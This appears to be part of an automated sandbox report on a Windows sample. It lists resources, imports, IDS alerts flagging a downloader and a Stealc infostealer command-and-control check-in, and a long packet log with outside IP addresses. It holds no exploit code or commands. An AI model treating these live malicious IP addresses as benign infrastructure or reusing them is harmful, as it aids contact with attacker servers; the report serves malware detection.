RT_ICON | 0x1343e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.5968574108818011
RT_ICON | 0x135490 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.5926229508196721
RT_ICON | 0x135e18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.7331560283687943
RT_ICON | 0x1362f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.3358208955223881
RT_ICON | 0x1371a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.39395306859205775
RT_ICON | 0x137a48 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.3957373271889401
RT_ICON | 0x138110 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.4060693641618497
RT_ICON | 0x138678 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.22095435684647302
RT_ICON | 0x13ac20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.24835834896810507
RT_ICON | 0x13bcc8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.28647540983606556
RT_ICON | 0x13c650 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.3147163120567376
RT_ICON | 0x13cb30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39019189765458423
RT_ICON | 0x13d9d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5464801444043321
RT_ICON | 0x13e280 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6094470046082949
RT_ICON | 0x13e948 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6401734104046243
RT_ICON | 0x13eeb0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.4101782363977486
RT_ICON | 0x13ff58 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.39959016393442626
RT_ICON | 0x1408e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.44858156028368795
RT_ICON | 0x140db0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.8219616204690832
RT_ICON | 0x141c58 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.858754512635379
RT_ICON | 0x142500 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.8099078341013825
RT_ICON | 0x142bc8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7528901734104047
RT_ICON | 0x143130 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.8047717842323652
RT_ICON | 0x1456d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.8332551594746717
RT_ICON | 0x146780 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.8434426229508196
RT_ICON | 0x147108 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.8643617021276596
RT_STRING | 0x149e98 | 0x9a | data | | | 0.6038961038961039
RT_STRING | 0x149f38 | 0x6da | data | | | 0.4264538198403649
RT_STRING | 0x14a618 | 0x4aa | data | | | 0.4455611390284757
RT_STRING | 0x14aac8 | 0x4dc | data | | | 0.4429260450160772
RT_STRING | 0x14afa8 | 0x7d4 | data | | | 0.41966067864271456
RT_STRING | 0x14b780 | 0x718 | data | | | 0.42841409691629956
RT_STRING | 0x14be98 | 0x696 | data | | | 0.4359430604982206
RT_STRING | 0x14c530 | 0x616 | data | | | 0.43902439024390244
RT_STRING | 0x14cb48 | 0x7de | data | | | 0.41807348560079444
RT_STRING | 0x14d328 | 0x5c6 | data | | | 0.4370771312584574
RT_STRING | 0x14d8f0 | 0x5d8 | data | | | 0.44385026737967914
RT_STRING | 0x14dec8 | 0x588 | data | | | 0.4392655367231638
RT_STRING | 0x14e450 | 0x616 | data | | | 0.43838254172015406
RT_STRING | 0x14ea68 | 0x4ee | data | | | 0.4548335974643423
RT_STRING | 0x14ef58 | 0x5a0 | data | | | 0.4354166666666667
RT_GROUP_CURSOR | 0x149cc0 | 0x22 | data | | | 1.0588235294117647
RT_GROUP_ICON | 0x147570 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x136280 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
RT_GROUP_ICON | 0x140d48 | 0x68 | data | Turkish | Turkey | 0.7211538461538461
RT_GROUP_ICON | 0x13cab8 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_VERSION | 0x149ce8 | 0x1b0 | data | | | 0.5856481481481481
DLL | Import
KERNEL32.dll | GetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
WINHTTP.dll | WinHttpOpenRequest
                                                          Language of compilation systemCountry where language is spokenMap
                                                          TurkishTurkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T19:08:32.658480+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 172.67.179.207 | 443 | TCP
2024-10-26T19:08:33.704551+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 176.113.115.37 | 80 | TCP
2024-10-26T19:08:41.936068+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49707 | 62.204.41.177 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Oct 26, 2024 19:08:34.153450012 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.153477907 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.153541088 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.153556108 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.153568029 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.153580904 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.153589964 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.153614998 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.153614998 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.153624058 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.153637886 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.153682947 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.153682947 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.153682947 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.157967091 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158018112 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158049107 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158087969 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158121109 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158207893 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158261061 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158272982 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158282995 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158293962 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158299923 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158305883 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158323050 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158323050 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158343077 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158361912 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158379078 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158390999 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158401966 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158405066 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158416033 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158426046 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158432007 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158437967 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158447981 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158489943 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158489943 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158490896 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158556938 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158587933 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158600092 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158612013 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158648014 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158648014 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158665895 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158685923 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158696890 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158711910 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158735991 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158735991 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158936977 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158946991 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158957958 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.158982992 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.158999920 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159020901 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159053087 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159065008 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159073114 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159076929 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159089088 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159100056 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159104109 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159113884 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159123898 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159135103 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159143925 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159143925 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159169912 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159169912 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159264088 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159276009 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159295082 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159305096 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159322023 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159332037 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159332991 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159332037 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159364939 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159364939 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159404993 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159415007 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159420967 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159431934 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159444094 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159483910 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159483910 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159483910 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159682989 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159706116 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159718037 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159728050 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159739017 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159746885 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159750938 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159759998 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159763098 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159775972 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159794092 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159807920 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159868002 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.159871101 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159883022 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159893990 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159904003 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159914970 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159925938 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159935951 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.159959078 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.160060883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.160060883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.160060883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602226019 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602257967 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602273941 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602288008 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602314949 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602329969 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602350950 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602364063 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602379084 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602394104 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602407932 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602423906 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602432013 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602432013 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602432013 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602432966 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602438927 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602466106 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602480888 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602485895 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602485895 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602498055 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602510929 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602524042 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602540970 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602554083 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602557898 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602557898 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602570057 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602580070 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602606058 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602606058 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602617025 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602632999 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602655888 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602670908 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602684975 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602699995 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602699995 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602700949 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602699995 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602718115 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602729082 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602729082 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602734089 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602749109 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602763891 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602776051 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602785110 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602785110 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602791071 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602807045 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602807999 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602824926 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602830887 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602847099 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602859020 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602873087 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602888107 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602901936 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602916956 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602930069 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602940083 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602940083 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602940083 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602940083 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602947950 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602965117 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602972031 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602977037 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602977037 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.602979898 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.602988005 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603010893 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603018999 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603025913 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603039980 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603048086 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603061914 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603076935 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603080988 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603091955 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603112936 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603127956 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603142023 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603156090 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603173018 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603176117 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603176117 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603176117 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603176117 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603188038 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603207111 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603209972 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603229046 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603244066 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603255987 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603270054 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603285074 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.603295088 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603295088 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603295088 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603295088 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.603300095 CEST8049705176.113.115.37192.168.2.5
Oct 26, 2024 19:08:34.603323936 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603324890 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603324890 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603348970 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603363991 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603363991 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603367090 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603380919 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603394985 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603404999 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603420973 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603436947 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603451967 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603466034 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603472948 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603472948 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603472948 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603472948 CEST  49705  80  192.168.2.5  176.113.115.37
Oct 26, 2024 19:08:34.603482008 CEST  80  49705  176.113.115.37  192.168.2.5
Oct 26, 2024 19:08:34.603497028 CEST  80  49705  176.113.115.37  192.168.2.5
